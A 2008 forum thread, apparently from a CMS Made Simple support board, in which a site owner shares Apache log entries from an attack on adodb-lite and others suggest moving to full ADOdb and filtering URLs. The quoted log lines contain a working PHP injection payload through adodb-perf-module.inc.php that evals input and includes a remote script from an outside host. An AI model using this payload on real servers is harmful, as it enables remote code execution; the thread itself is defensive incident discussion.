attacked by adodb-lite exploit

[ventilo35]

Hi people

I had a warning from the hosting company about some people attempting to hack my (old version  ) CMSMS... Because of the delay before the apache log is available, I had no hint, so I settled to upgrading to v1.4.1. The day after, I had another warning, and also access to the (first attack) log, so I could see the problem :

Code: Select all

web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:16 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 200 61 "-" "libwww-perl/5.65"

web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:19 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/no/modules/readme.txt??? HTTP/1.1" 500 543 "-" "libwww-perl/5.65"

I then proceeded to replace adodb-lite with the full adodb and setting $config['use_adodb_lite'] to false...
No attack so far

Is it a known problem ? Am I secure enough after replacing adodb-lite ? should everybody stop using adodb-lite ?

Thanks
7BZH

[Pierre M.]

See the security guide... such remote access to /lib with double slash or http in the URL are easily filtered out.

Pierre M.

[jmlarsen]

You should be safe when using the full ADODB, since the vulnerability only exists in the lite version.

See http://attrition.org/pipermail/vim/2007 ... 01800.html

[lg37]

I was also attacked thru this ADODB_lite exploit ...

moved to adodb full version

Best regards